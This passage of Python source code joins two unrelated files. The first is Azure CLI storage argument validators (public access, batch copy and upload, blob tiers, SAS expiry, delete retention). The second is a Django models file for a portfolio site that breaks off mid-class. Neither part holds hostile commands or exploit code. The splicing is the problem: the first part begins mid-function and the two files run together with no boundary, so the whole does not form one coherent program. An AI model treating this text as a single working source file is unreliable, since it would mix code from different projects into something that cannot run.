    if set(namespace.permission) - set('raud'):
        raise ValueError('valid values are {} or a combination thereof.'.format(
            '(r)ead/query (a)dd (u)pdate (d)elete'))
    namespace.permission = t_table_permissions(_str=namespace.permission)
def validate_container_public_access(cmd, namespace):
    """Map --public-access onto the SDK constant and, for set-permission commands,
    pre-fetch the container's existing ACL so the call behaves like a patch."""
    from .sdkutil import get_container_access_type
    t_base_blob_svc = cmd.get_models('blob.baseblobservice#BaseBlobService')
    if namespace.public_access:
        namespace.public_access = get_container_access_type(cmd.cli_ctx, namespace.public_access.lower())
        if hasattr(namespace, 'signed_identifiers'):
            # must retrieve the existing ACL to simulate a patch operation because these calls
            # are needlessly conflated
            ns = vars(namespace)
            validate_client_parameters(cmd, namespace)
            account = ns.get('account_name')
            key = ns.get('account_key')
            cs = ns.get('connection_string')
            sas = ns.get('sas_token')
            client = get_storage_data_service_client(cmd.cli_ctx, t_base_blob_svc, account, key, cs, sas)
            container = ns.get('container_name')
            lease_id = ns.get('lease_id')
            ns['signed_identifiers'] = client.get_container_acl(container, lease_id=lease_id)
def validate_fs_public_access(cmd, namespace):
    """Map the textual --public-access value onto the filesystem access-type constant."""
    from .sdkutil import get_fs_access_type
    if namespace.public_access:
        lowered = namespace.public_access.lower()
        namespace.public_access = get_fs_access_type(cmd.cli_ctx, lowered)
def validate_select(namespace):
    """Collapse the list of --select columns into one comma-separated string."""
    selected = namespace.select
    if not selected:
        return
    namespace.select = ','.join(selected)
# pylint: disable=too-many-statements
def get_source_file_or_blob_service_client(cmd, namespace):
    """
    Create the second file service or blob service client for batch copy command, which is used to
    list the source files or blobs. If both the source account and source URI are omitted, it
    indicates that user want to copy files or blobs in the same storage account, therefore the
    destination client will be set None hence the command will use destination client.

    Stores the result in ns['source_client']; consumes (pops) source_account_name,
    source_account_key and source_uri from the namespace.
    """
    t_file_svc, t_block_blob_svc = cmd.get_models('file#FileService', 'blob.blockblobservice#BlockBlobService')
    usage_string = 'invalid usage: supply only one of the following argument sets:' + \
                   '\n\t --source-uri [--source-sas]' + \
                   '\n\tOR --source-container' + \
                   '\n\tOR --source-container --source-account-name --source-account-key' + \
                   '\n\tOR --source-container --source-account-name --source-sas' + \
                   '\n\tOR --source-share --source-account-name --source-account-key' + \
                   '\n\tOR --source-share --source-account-name --source-account-sas'
    ns = vars(namespace)
    source_account = ns.pop('source_account_name', None)
    source_key = ns.pop('source_account_key', None)
    source_uri = ns.pop('source_uri', None)
    source_sas = ns.get('source_sas', None)
    source_container = ns.get('source_container', None)
    source_share = ns.get('source_share', None)
    if source_uri and source_account:
        raise ValueError(usage_string)
    if not source_uri and bool(source_container) == bool(source_share):  # must be container or share
        raise ValueError(usage_string)
    if (not source_account) and (not source_uri):
        # Set the source_client to None if neither source_account or source_uri is given. This
        # indicates the command that the source files share or blob container is in the same storage
        # account as the destination file share or blob container.
        #
        # The command itself should create the source service client since the validator can't
        # access the destination client through the namespace.
        #
        # A few arguments check will be made as well so as not to cause ambiguity.
        if source_key or source_sas:
            raise ValueError('invalid usage: --source-account-name is missing; the source account is assumed to be the'
                             ' same as the destination account. Do not provide --source-sas or --source-account-key')
        ns['source_client'] = None
        if 'token_credential' not in ns:  # not using oauth
            return
        # oauth is only possible through destination, must still get source creds
        source_account, source_key, source_sas = ns['account_name'], ns['account_key'], ns['sas_token']
    if source_account:
        if not (source_key or source_sas):
            # when neither storage account key or SAS is given, try to fetch the key in the current
            # subscription
            source_key = _query_account_key(cmd.cli_ctx, source_account)
        if source_container:
            ns['source_client'] = get_storage_data_service_client(
                cmd.cli_ctx, t_block_blob_svc, name=source_account, key=source_key, sas_token=source_sas)
        elif source_share:
            ns['source_client'] = get_storage_data_service_client(
                cmd.cli_ctx, t_file_svc, name=source_account, key=source_key, sas_token=source_sas)
    elif source_uri:
        if source_key or source_container or source_share:
            raise ValueError(usage_string)
        from .storage_url_helpers import StorageResourceIdentifier
        if source_sas:
            source_uri = '{}{}{}'.format(source_uri, '?', source_sas.lstrip('?'))
        identifier = StorageResourceIdentifier(cmd.cli_ctx.cloud, source_uri)
        nor_container_or_share = not identifier.container and not identifier.share
        if not identifier.is_url():
            raise ValueError('incorrect usage: --source-uri expects a URI')
        if identifier.blob or identifier.directory or identifier.filename or nor_container_or_share:
            raise ValueError('incorrect usage: --source-uri has to be blob container or file share')
        if identifier.sas_token:
            ns['source_sas'] = identifier.sas_token
        else:
            source_key = _query_account_key(cmd.cli_ctx, identifier.account_name)
        # only build a dedicated source client when the URI points at a different account
        if identifier.container:
            ns['source_container'] = identifier.container
            if identifier.account_name != ns.get('account_name'):
                ns['source_client'] = get_storage_data_service_client(
                    cmd.cli_ctx, t_block_blob_svc, name=identifier.account_name, key=source_key,
                    sas_token=identifier.sas_token)
        elif identifier.share:
            ns['source_share'] = identifier.share
            if identifier.account_name != ns.get('account_name'):
                ns['source_client'] = get_storage_data_service_client(
                    cmd.cli_ctx, t_file_svc, name=identifier.account_name, key=source_key,
                    sas_token=identifier.sas_token)
def add_progress_callback(cmd, namespace):
    """Install a CLI progress-bar callback on the namespace unless --no-progress was given."""
    hook = cmd.cli_ctx.get_progress_controller(det=True)

    def _update_progress(current, total):
        # 'message'/'reuse' may be attached to the function object by callers
        message = getattr(_update_progress, 'message', 'Alive')
        reuse = getattr(_update_progress, 'reuse', False)
        if total:
            hook.add(message=message, value=current, total_val=total)
            if total == current and not reuse:
                hook.end()

    _update_progress.hook = hook
    if not namespace.no_progress:
        namespace.progress_callback = _update_progress
    del namespace.no_progress
def process_container_delete_parameters(cmd, namespace):
    """Process the parameters for storage container delete command"""
    if namespace.bypass_immutability_policy:
        # bypassing immutability needs the management plane: resolve the resource
        # group and an ARM client instead of data-plane credentials
        namespace.processed_account_name = namespace.account_name
        namespace.processed_resource_group, namespace.mgmt_client = _query_account_rg(
            cmd.cli_ctx, namespace.account_name)
        del namespace.auth_mode
        return
    # data-plane path: resolve credentials the usual way
    validate_client_parameters(cmd, namespace)
def process_blob_download_batch_parameters(cmd, namespace):
    """Process the parameters for storage blob download command"""
    import os
    # destination must be a pre-existing local directory
    if not (os.path.exists(namespace.destination) and os.path.isdir(namespace.destination)):
        raise ValueError('incorrect usage: destination must be an existing directory')
    # resolve account/container (and credentials) from the source string,
    # then wire up progress reporting
    _process_blob_batch_container_parameters(cmd, namespace)
    add_progress_callback(cmd, namespace)
def process_blob_upload_batch_parameters(cmd, namespace):
    """Process the source and destination of storage blob upload command"""
    import os

    # the local source must be an existing directory
    if not (os.path.exists(namespace.source) and os.path.isdir(namespace.source)):
        raise ValueError('incorrect usage: source must be an existing directory')

    # resolve account/container from the destination string
    _process_blob_batch_container_parameters(cmd, namespace, source=False)

    # collect the local files to be uploaded
    namespace.source = os.path.realpath(namespace.source)
    namespace.source_files = list(glob_files_locally(namespace.source, namespace.pattern))

    # infer the blob type when not given: all .vhd -> page, none -> block, mixed -> error
    if namespace.blob_type is None:
        vhd_files = [f for f in namespace.source_files if f[0].endswith('.vhd')]
        if any(vhd_files) and len(vhd_files) == len(namespace.source_files):
            # when all the listed files are vhd files use page
            namespace.blob_type = 'page'
        elif any(vhd_files):
            # source files contain vhd files but not all of them
            raise CLIError("""Fail to guess the required blob type. Type of the files to be
            uploaded are not consistent. Default blob type for .vhd files is "page", while
            others are "block". You can solve this problem by either explicitly set the blob
            type or ensure the pattern matches a correct set of files.""")
        else:
            namespace.blob_type = 'block'

    # remaining validators: metadata, content settings, progress reporting
    validate_metadata(namespace)
    t_blob_content_settings = cmd.loader.get_sdk('blob.models#ContentSettings')
    get_content_setting_validator(t_blob_content_settings, update=False)(cmd, namespace)
    add_progress_callback(cmd, namespace)
def process_blob_delete_batch_parameters(cmd, namespace):
    """Resolve account/container (and credentials) from the --source argument."""
    _process_blob_batch_container_parameters(cmd, namespace)
def _process_blob_batch_container_parameters(cmd, namespace, source=True):
    """Process the container parameters for storage blob batch commands before populating args from environment.

    The source/destination argument may be either a bare container name or a
    container URL; in the URL case the account name and SAS token are also
    extracted when not already supplied.
    """
    if source:
        container_arg, container_name_arg = 'source', 'source_container_name'
    else:
        # destination
        container_arg, container_name_arg = 'destination', 'destination_container_name'
    # try to extract account name and container name from source string
    from .storage_url_helpers import StorageResourceIdentifier
    container_arg_val = getattr(namespace, container_arg)  # either a url or name
    identifier = StorageResourceIdentifier(cmd.cli_ctx.cloud, container_arg_val)
    if not identifier.is_url():
        setattr(namespace, container_name_arg, container_arg_val)
    elif identifier.blob:
        raise ValueError('incorrect usage: {} should be either a container URL or name'.format(container_arg))
    else:
        setattr(namespace, container_name_arg, identifier.container)
        if namespace.account_name is None:
            namespace.account_name = identifier.account_name
        elif namespace.account_name != identifier.account_name:
            raise ValueError('The given storage account name is not consistent with the '
                             'account name in the destination URL')
        # if no sas-token is given and the container url contains one, use it
        if not namespace.sas_token and identifier.sas_token:
            namespace.sas_token = identifier.sas_token
    # Finally, grab missing storage connection parameters from environment variables
    validate_client_parameters(cmd, namespace)
def process_file_upload_batch_parameters(cmd, namespace):
    """Process the parameters of storage file batch upload command"""
    import os

    # the local source must be an existing directory
    if not os.path.exists(namespace.source):
        raise ValueError('incorrect usage: source {} does not exist'.format(namespace.source))
    if not os.path.isdir(namespace.source):
        raise ValueError('incorrect usage: source must be a directory')
    namespace.source = os.path.realpath(namespace.source)

    # when destination is a URL, reduce it to the bare share name
    # (and pick up the account name when not already set)
    from .storage_url_helpers import StorageResourceIdentifier
    identifier = StorageResourceIdentifier(cmd.cli_ctx.cloud, namespace.destination)
    if identifier.is_url():
        if identifier.filename or identifier.directory:
            raise ValueError('incorrect usage: destination must be a file share url')
        namespace.destination = identifier.share
        if not namespace.account_name:
            namespace.account_name = identifier.account_name
def process_file_download_batch_parameters(cmd, namespace):
    """Process the parameters for storage file batch download command"""
    import os
    # destination must be a pre-existing local directory
    if not (os.path.exists(namespace.destination) and os.path.isdir(namespace.destination)):
        raise ValueError('incorrect usage: destination must be an existing directory')
    # derive account/share from the source string
    process_file_batch_source_parameters(cmd, namespace)
def process_file_batch_source_parameters(cmd, namespace):
    """Reduce a share-URL source to its share name, picking up the account name when absent."""
    from .storage_url_helpers import StorageResourceIdentifier
    identifier = StorageResourceIdentifier(cmd.cli_ctx.cloud, namespace.source)
    if not identifier.is_url():
        return
    if identifier.filename or identifier.directory:
        raise ValueError('incorrect usage: source should be either share URL or name')
    namespace.source = identifier.share
    if not namespace.account_name:
        namespace.account_name = identifier.account_name
def process_file_download_namespace(namespace):
    """Resolve the local target path for `storage file download`.

    After the shared file-path validation, a missing or directory-valued
    destination is completed with the remote file name.
    """
    import os
    get_file_path_validator()(namespace)
    dest = namespace.file_path
    if not dest:
        # No destination given: download under the remote file name.
        namespace.file_path = namespace.file_name
    elif os.path.isdir(dest):
        # Destination is a directory: append the remote file name.
        namespace.file_path = os.path.join(dest, namespace.file_name)
def process_metric_update_namespace(namespace):
    """Normalize 'true'/'false' string flags for `storage metrics update`.

    NOTE(review): after conversion --hour/--minute are plain booleans, so
    the `is None` guard below can never fire; it is kept for parity with
    the original behavior.
    """
    def as_flag(value):
        return value == 'true'

    namespace.hour = as_flag(namespace.hour)
    namespace.minute = as_flag(namespace.minute)
    namespace.api = as_flag(namespace.api) if namespace.api else None
    if namespace.hour is None and namespace.minute is None:
        raise argparse.ArgumentError(
            None, 'incorrect usage: must specify --hour and/or --minute')
    if (namespace.hour or namespace.minute) and namespace.api is None:
        raise argparse.ArgumentError(
            None, 'incorrect usage: specify --api when hour or minute metrics are enabled')
def validate_subnet(cmd, namespace):
    """Expand a subnet name plus --vnet-name into a full resource ID.

    Nothing to do when the subnet is already a resource ID (or nothing was
    given); any other combination of --subnet/--vnet-name is rejected.
    """
    from msrestazure.tools import resource_id, is_valid_resource_id
    from azure.cli.core.commands.client_factory import get_subscription_id
    subnet = namespace.subnet
    vnet = namespace.vnet_name
    is_id = is_valid_resource_id(subnet)
    if (is_id and not vnet) or not (subnet or vnet):
        return
    # Remaining valid case: a bare subnet name together with a vnet name.
    if is_id or not (subnet and vnet):
        raise CLIError('incorrect usage: [--subnet ID | --subnet NAME --vnet-name NAME]')
    namespace.subnet = resource_id(
        subscription=get_subscription_id(cmd.cli_ctx),
        resource_group=namespace.resource_group_name,
        namespace='Microsoft.Network',
        type='virtualNetworks',
        name=vnet,
        child_type_1='subnets',
        child_name_1=subnet)
def get_datetime_type(to_string):
    """ Build an argparse type that validates UTC datetimes.

    Accepted forms: 2017-12-31T01:11:59Z, 2017-12-31T01:11Z,
    2017-12-31T01Z and 2017-12-31. When `to_string` is truthy the parsed
    value is normalized back to the matching string form; otherwise a
    `datetime` instance is returned.
    """
    from datetime import datetime

    accepted_date_formats = ['%Y-%m-%dT%H:%M:%SZ', '%Y-%m-%dT%H:%MZ',
                             '%Y-%m-%dT%HZ', '%Y-%m-%d']

    def datetime_type(string):
        """ Validate a UTC datetime string (see get_datetime_type). """
        for form in accepted_date_formats:
            try:
                parsed = datetime.strptime(string, form)
            except ValueError:
                continue
            return parsed.strftime(form) if to_string else parsed
        raise ValueError("Input '{}' not valid. Valid example: 2000-12-31T12:59:59Z".format(string))
    return datetime_type
def ipv4_range_type(string):
    """ Validate an IPv4 address ('1.2.3.4') or range ('1.2.3.4-5.6.7.8').

    Only the dotted-quad shape is checked (octet values are not bounded);
    raises ValueError on anything else and returns the input unchanged.
    """
    import re
    ip_format = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
    single = re.match("^{}$".format(ip_format), string)
    pair = re.match("^{ip_format}-{ip_format}$".format(ip_format=ip_format), string)
    if single is None and pair is None:
        raise ValueError
    return string
def resource_type_type(loader):
    """ Return an argparse type for storage resource-type strings.

    The string may only contain the shorthand letters 's' (service),
    'c' (container) and 'o' (object); duplicates are collapsed.
    """
    def impl(string):
        t_resources = loader.get_models('common.models#ResourceTypes')
        unique = set(string)
        if not unique <= set("sco"):
            raise ValueError
        return t_resources(_str=''.join(unique))
    return impl
def services_type(loader):
    """ Return an argparse type for storage services strings.

    Valid shorthand letters: 'b' (blob), 'q' (queue), 't' (table) and
    'f' (file); duplicates are collapsed.
    """
    def impl(string):
        t_services = loader.get_models('common.models#Services')
        unique = set(string)
        if not unique <= set("bqtf"):
            raise ValueError
        return t_services(_str=''.join(unique))
    return impl
def get_char_options_validator(types, property_name):
    """ Build a validator ensuring a namespace attribute contains only
    characters from `types`; the attribute is replaced in place with the
    de-duplicated set of characters.
    """
    def _validate(namespace):
        service_types = set(getattr(namespace, property_name, []))
        if not service_types:
            raise ValueError('Missing options --{}.'.format(property_name.replace('_', '-')))
        if not service_types <= set(types):
            raise ValueError(
                '--{}: only valid values are: {}.'.format(property_name.replace('_', '-'), ', '.join(types)))
        setattr(namespace, property_name, service_types)
    return _validate
def page_blob_tier_validator(cmd, namespace):
    """Translate --tier into a PremiumPageBlobTier enum value.

    Tiers are only meaningful for page blobs; an unknown tier name is
    reported together with the list of valid choices.
    """
    tier = namespace.tier
    if not tier:
        return
    if namespace.blob_type != 'page':
        raise ValueError('Blob tier is only applicable to page blobs on premium storage accounts.')
    try:
        namespace.tier = getattr(cmd.get_models('blob.models#PremiumPageBlobTier'), tier)
    except AttributeError:
        from azure.cli.command_modules.storage.sdkutil import get_blob_tier_names
        raise ValueError('Unknown premium page blob tier name. Choose among {}'.format(', '.join(
            get_blob_tier_names(cmd.cli_ctx, 'PremiumPageBlobTier'))))
def block_blob_tier_validator(cmd, namespace):
    """Translate --tier into a StandardBlobTier enum value.

    Tiers are only meaningful for block blobs; an unknown tier name is
    reported together with the list of valid choices.
    """
    tier = namespace.tier
    if not tier:
        return
    if namespace.blob_type != 'block':
        raise ValueError('Blob tier is only applicable to block blobs on standard storage accounts.')
    try:
        namespace.tier = getattr(cmd.get_models('blob.models#StandardBlobTier'), tier)
    except AttributeError:
        from azure.cli.command_modules.storage.sdkutil import get_blob_tier_names
        raise ValueError('Unknown block blob tier name. Choose among {}'.format(', '.join(
            get_blob_tier_names(cmd.cli_ctx, 'StandardBlobTier'))))
def blob_tier_validator(cmd, namespace):
    """Dispatch tier validation to the page- or block-blob variant."""
    blob_type = namespace.blob_type
    if blob_type not in ('page', 'block'):
        raise ValueError('Blob tier is only applicable to block or page blob.')
    if blob_type == 'page':
        page_blob_tier_validator(cmd, namespace)
    else:
        block_blob_tier_validator(cmd, namespace)
def blob_rehydrate_priority_validator(namespace):
    """Validate --rehydrate-priority and default it to 'Standard'.

    Rehydration only applies to block blobs being moved out of the Archive
    tier, so the option is rejected for page blobs and for requests that
    set the tier *to* Archive.
    """
    priority = namespace.rehydrate_priority
    if priority and namespace.blob_type == 'page':
        raise ValueError('--rehydrate-priority is only applicable to block blob.')
    if priority and namespace.tier == 'Archive':
        raise ValueError('--rehydrate-priority is only applicable to rehydrate blob data from the archive tier.')
    if priority is None:
        namespace.rehydrate_priority = 'Standard'
def validate_azcopy_upload_destination_url(cmd, namespace):
    """Convert --destination-container/--destination-path into a blob URL.

    The namespace ends up with a single `destination` attribute; the two
    original attributes are removed.
    """
    client = blob_data_service_factory(cmd.cli_ctx, {
        'account_name': namespace.account_name, 'connection_string': namespace.connection_string})
    destination_path = namespace.destination_path or ''
    namespace.destination = client.make_blob_url(namespace.destination_container, destination_path)
    del namespace.destination_container
    del namespace.destination_path
def validate_azcopy_remove_arguments(cmd, namespace):
    """Validate and build the deletion target for `storage remove`.

    Exactly one of a blob source (--container-name [--name]) or a file
    source (--share-name [--path]) must be supplied. The matching service
    URL is stored on `namespace.target` and `namespace.service` records
    which data service it belongs to; the raw source attributes are
    removed from the namespace.

    Raises ValueError when no source, or both kinds of source, are given.
    """
    usage_string = \
        'Invalid usage: {}. Supply only one of the following argument sets to specify source:' \
        '\n\t --container-name [--name]' \
        '\n\tOR --share-name [--path]'
    ns = vars(namespace)
    # source as blob
    container = ns.pop('container_name', None)
    blob = ns.pop('blob_name', None)
    # source as file
    share = ns.pop('share_name', None)
    path = ns.pop('path', None)
    # Exactly one of the two source kinds must be given.
    if container and share:
        # BUGFIX: previously `valid_blob`/`valid_file` were both False when
        # both sources were supplied, so this case fell through to the
        # misleading 'Neither ...' message and the 'Ambiguous' branch was
        # unreachable.
        raise ValueError(usage_string.format('Ambiguous parameters, both blob and file sources are '
                                             'specified'))
    if not container and not share:
        raise ValueError(usage_string.format('Neither a valid blob or file source is specified'))
    if container:
        client = blob_data_service_factory(cmd.cli_ctx, {
            'account_name': namespace.account_name})
        namespace.service = 'blob'
        namespace.target = client.make_blob_url(container, blob or '')
    else:
        import os
        client = file_data_service_factory(cmd.cli_ctx, {
            'account_name': namespace.account_name,
            'account_key': namespace.account_key})
        dir_name, file_name = os.path.split(path) if path else (None, '')
        # Normalize "no directory" to None for make_file_url.
        dir_name = None if dir_name in ('', '.') else dir_name
        namespace.service = 'file'
        namespace.target = client.make_file_url(share, dir_name, file_name)
def as_user_validator(namespace):
    """Validate --as-user for user-delegation SAS generation.

    --as-user requires login-based auth and an --expiry no more than seven
    days out; it is mandatory whenever a token credential is in play.
    """
    if hasattr(namespace, 'token_credential') and not namespace.as_user:
        raise CLIError('incorrect usage: specify --as-user when --auth-mode login is used to get user delegation key.')
    if not namespace.as_user:
        return
    if namespace.expiry is None:
        raise argparse.ArgumentError(
            None, 'incorrect usage: specify --expiry when as-user is enabled')
    expiry = get_datetime_type(False)(namespace.expiry)
    from datetime import datetime, timedelta
    # User delegation keys cannot outlive seven days.
    if expiry > datetime.utcnow() + timedelta(days=7):
        raise argparse.ArgumentError(
            None, 'incorrect usage: --expiry should be within 7 days from now')
    has_token = hasattr(namespace, 'token_credential') and namespace.token_credential is not None
    uses_login = hasattr(namespace, 'auth_mode') and namespace.auth_mode == 'login'
    if not has_token and not uses_login:
        raise argparse.ArgumentError(
            None, "incorrect usage: specify '--auth-mode login' when as-user is enabled")
def validator_delete_retention_days(namespace):
    """Cross-validate --enable-delete-retention and --delete-retention-days.

    The two options must be supplied together (a day count only makes sense
    while enabling retention), and the retention period must lie in 1..365.
    """
    enabled = namespace.enable_delete_retention
    days = namespace.delete_retention_days
    if enabled is True and days is None:
        raise ValueError(
            "incorrect usage: you have to provide value for '--delete-retention-days' when '--enable-delete-retention' "
            "is set to true")
    if enabled is False and days is not None:
        raise ValueError(
            "incorrect usage: '--delete-retention-days' is invalid when '--enable-delete-retention' is set to false")
    if enabled is None and days is not None:
        raise ValueError(
            "incorrect usage: please specify '--enable-delete-retention true' if you want to set the value for "
            "'--delete-retention-days'")
    # `days or days == 0` keeps the original "any number given" semantics.
    if days or days == 0:
        if days < 1:
            raise ValueError(
                "incorrect usage: '--delete-retention-days' must be greater than or equal to 1")
        if days > 365:
            raise ValueError(
                "incorrect usage: '--delete-retention-days' must be less than or equal to 365")
def validate_delete_retention_days(namespace):
    """Require --delete-retention-days if and only if retention is enabled."""
    enabled = namespace.enable_delete_retention
    days = namespace.delete_retention_days
    if enabled is True and days is None:
        raise ValueError(
            "incorrect usage: you have to provide value for '--delete-retention-days' when '--enable-delete-retention' "
            "is set to true")
    if enabled is False and days is not None:
        raise ValueError(
            "incorrect usage: '--delete-retention-days' is invalid when '--enable-delete-retention' is set to false")
# pylint: disable=too-few-public-methods
class BlobRangeAddAction(argparse._AppendAction):
    """argparse action collecting repeated --blob-range pairs into
    `namespace.blob_ranges` as BlobRestoreRange model instances."""

    def __call__(self, parser, namespace, values, option_string=None):
        namespace.blob_ranges = namespace.blob_ranges or []
        # argparse may hand over either a pre-joined string or a token list.
        text = ' '.join(values) if isinstance(values, list) else values
        blob_range_cls = namespace._cmd.get_models('BlobRestoreRange', resource_type=ResourceType.MGMT_STORAGE)
        try:
            start_range, end_range = text.split(' ')
        except (ValueError, TypeError):
            raise CLIError('usage error: --blob-range VARIABLE OPERATOR VALUE')
        namespace.blob_ranges.append(blob_range_cls(
            start_range=start_range,
            end_range=end_range
        ))
def validate_private_endpoint_connection_id(cmd, namespace):
    """Accept either --id or the --name/--account-name pair for private
    endpoint connection commands, filling in whatever can be derived."""
    if namespace.connection_id:
        from azure.cli.core.util import parse_proxy_resource_id
        parsed = parse_proxy_resource_id(namespace.connection_id)
        namespace.resource_group_name = parsed['resource_group']
        namespace.account_name = parsed['name']
        namespace.private_endpoint_connection_name = parsed['child_name_1']
    if namespace.account_name and not namespace.resource_group_name:
        # Look the resource group up from the account name.
        namespace.resource_group_name = _query_account_rg(cmd.cli_ctx, namespace.account_name)[0]
    required = (namespace.account_name, namespace.resource_group_name,
                namespace.private_endpoint_connection_name)
    if not all(required):
        raise CLIError('incorrect usage: [--id ID | --name NAME --account-name NAME]')
    del namespace.connection_id
def pop_data_client_auth(ns):
    """Strip data-plane auth attributes from the namespace (management-plane
    calls must not receive them)."""
    for attr in ('auth_mode', 'account_key', 'connection_string', 'sas_token'):
        delattr(ns, attr)
def validate_client_auth_parameter(cmd, ns):
    """Validate container-create auth arguments.

    Encryption-scope parameters route the call to the management plane (so
    data-plane credentials are stripped); otherwise the normal data-plane
    parameter validation applies. Both scope options must be given together.
    """
    from .sdkutil import get_container_access_type
    if ns.public_access:
        ns.public_access = get_container_access_type(cmd.cli_ctx, ns.public_access.lower())
    has_default_scope = bool(ns.default_encryption_scope)
    has_override = ns.prevent_encryption_scope_override is not None
    if has_default_scope and has_override:
        # Management-plane path: recover account/RG, drop data-plane auth.
        if not ns.account_name:
            ns.account_name = get_config_value(cmd, 'storage', 'account', None)
        if ns.account_name and not ns.resource_group_name:
            ns.resource_group_name = _query_account_rg(cmd.cli_ctx, account_name=ns.account_name)[0]
        pop_data_client_auth(ns)
    elif has_default_scope != has_override:
        raise CLIError("usage error: You need to specify both --default-encryption-scope and "
                       "--prevent-encryption-scope-override to set encryption scope information "
                       "when creating container.")
    else:
        validate_client_parameters(cmd, ns)
def validate_encryption_scope_client_params(ns):
    """Drop socket_timeout when an encryption scope forces the track2 SDK
    client (which does not take that parameter)."""
    if not ns.encryption_scope:
        return
    del ns.socket_timeout
def validate_access_control(namespace):
    """Reject the combination of --acl and --permissions (mutually exclusive)."""
    both_given = namespace.acl and namespace.permissions
    if both_given:
        raise CLIError('usage error: invalid when specifying both --acl and --permissions.')
def validate_service_type(services, service_type):
    """Return whether `services` (shorthand letters) includes the flag for
    `service_type`; types other than table/blob/queue yield None."""
    shorthand = {'table': 't', 'blob': 'b', 'queue': 'q'}
    if service_type in shorthand:
        return shorthand[service_type] in services
def validate_logging_version(namespace):
    """Table-service logging only supports analytics version 1.0."""
    if not validate_service_type(namespace.services, 'table'):
        return
    if namespace.version != 1.0:
        raise CLIError(
            'incorrect usage: for table service, the supported version for logging is `1.0`. For more information, '
            'please refer to https://docs.microsoft.com/rest/api/storageservices/storage-analytics-log-format.')
|
|
# -*- coding: utf-8 -*-
# Polymorphism with Django:
# + http://stackoverflow.com/questions/1397537/polymorphism-in-django
# + http://stackoverflow.com/questions/929029/how-do-i-access-the-child-classes-of-an-object-in-django-without-knowing-the-nam/929982#929982
import os
import re
import sys
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from django.db.models.signals import pre_delete, post_save
from django.dispatch import receiver
from django.core.urlresolvers import reverse
from projects.CustomFileField import CustomFileField
def log(text):
    """Write a debug line to stderr.

    Uses sys.stderr.write instead of the Python-2-only ``print >>`` syntax,
    so the helper works under both Python 2 and 3.
    """
    sys.stderr.write('%s\n' % text)
class Category(models.Model): #eg.: Security/Game/Network..
    """A project category (e.g. Security, Game, Network)."""
    # Display name of the category.
    name = models.CharField(max_length=50, help_text=_("Category name"))
    # Slug used in URLs.
    name_url = models.CharField(max_length=20, help_text=_("Category name (URL)"))
    def __unicode__(self):
        return self.name
class Technology(models.Model): #eg.: C/SDL/Java..
    """A technology used by projects (e.g. C, SDL, Java); may be nested
    via parent_technology (e.g. Django -> Python)."""
    name = models.CharField(max_length=50, help_text=_("Technology name"))
    # Slug used in URLs.
    name_url = models.CharField(max_length=20, help_text=_("Technology name (URL)"))
    parent_technology = models.ForeignKey('self', blank=True, null=True, help_text=_("eg. Python is a parent technology for Django"))
    # '|'-separated list of file extensions, e.g. 'js|css'.
    file_extensions = models.CharField(max_length=50, blank=True, null=True, help_text=_("Possible file extensions (eg. 'txt') separated by '|' (eg. 'js|css')"))
    def __unicode__(self):
        return self.name
class Project(models.Model):
    """A portfolio project; belongs to a Category and uses N Technologies."""
    name = models.CharField(max_length=50, help_text=_("Project name"))
    name_url = models.CharField(max_length=20, unique=True, help_text=_("Project name (URL)"))
    short_description = models.CharField(max_length=155, help_text=_("Short description (max. 155)"))
    year = models.IntegerField(help_text=_("Release date"))
    private = models.BooleanField(default=True, help_text=_("Private => visible only if logged in"))
    category = models.ForeignKey(Category, help_text=_("Category"))
    technologies = models.ManyToManyField(Technology, help_text=_("Technologies"))
    created = models.DateTimeField(auto_now_add=True, help_text=_("Timestamp of creation"))
    modified = models.DateTimeField(auto_now=True, help_text=_("Timestamp of last changes (Project or related objects)"))
    def update_technologies(self):
        """
        Add missing parent Technology entries to the M2M relation
        (eg. Django implies Python).

        Note: `technos` is deliberately extended while being iterated, so
        transitive parents (grand-parents, ...) are also picked up.

        Historical note: overloading .save() and listening to the
        pre_save/post_save signals were tried first; neither worked.
        """
        update_required = False
        technos = list(self.technologies.all())
        for techno in technos:
            if techno.parent_technology and techno.parent_technology not in technos:
                technos.append(techno.parent_technology)
                self.technologies.add(techno.parent_technology)
                update_required = True
        if update_required:
            # Touch the row so `modified` reflects the M2M change.
            self.save()
    def __unicode__(self):
        return self.name
    def get_absolute_url(self):
        """
        Method called during sitemap generation.
        """
        return reverse('projects.views.show_project', args=[self.year, self.name_url,])
    class Meta:
        unique_together = ("name_url", "year",)
@receiver(pre_delete, sender=Project, dispatch_uid='project_delete_signal')
def pre_delete_project(sender, instance, using, **kwargs):
    """
    Explicitly delete the related Download and Description rows before a
    Project is removed.

    Normally Django's cascade would do this by itself; kept as a safety net
    to make sure everything is deleted properly.
    """
    instance.download_set.all().delete()
    instance.description_set.all().delete()
class Download(models.Model):
    """A downloadable file, optionally attached to a Project."""
    def upload_path(self, filename):
        # Store under downloads/<project_id>/ when linked, downloads/ otherwise.
        if self.project:
            return os.path.join('downloads', str(self.project.id), filename)
        else:
            return os.path.join('downloads', filename)
    project = models.ForeignKey(Project, blank=True, null=True, help_text=_("Linked to the project"))
    down = models.FileField(upload_to=upload_path, help_text=_("Downloadable file"))
@receiver(pre_delete, sender=Download, dispatch_uid='download_delete_signal')
def pre_delete_download(sender, instance, using, **kwargs):
    """Remove the underlying file from disk when a Download row is deleted."""
    if os.path.isfile(instance.down.path):
        os.remove(instance.down.path)
@receiver(post_save, sender=Download, dispatch_uid='download_save_signal')
def post_save_download(sender, instance, using, **kwargs):
    """Touch the parent Project so its `modified` timestamp is refreshed."""
    if instance.project:
        instance.project.save() #Update modified
class InheritanceCastModel(models.Model):
    """
    An abstract base class that provides a ``real_type`` FK to ContentType.
    For use in trees of inherited models, to be able to downcast
    parent instances to their child types.
    """
    # Concrete (leaf) ContentType of this row; filled in on first save.
    real_type = models.ForeignKey(ContentType, editable=False)
    def save(self, *args, **kwargs):
        # Record the concrete type only on insert (no primary key yet).
        if not self.id:
            self.real_type = self._get_real_type()
        super(InheritanceCastModel, self).save(*args, **kwargs)
    def _get_real_type(self):
        """Return the ContentType of the instance's concrete class."""
        return ContentType.objects.get_for_model(type(self))
    def cast(self):
        """Return this row as an instance of its concrete subclass."""
        return self.real_type.get_object_for_this_type(pk=self.pk)
    class Meta:
        abstract = True
class Code(InheritanceCastModel):
    """
    Code is the parent class of
    + SourceCode
    + Repository
    Code is linked via SourceToTechnoLines to Technology;
    the aim of this link is to count the number of lines for a given project.
    """
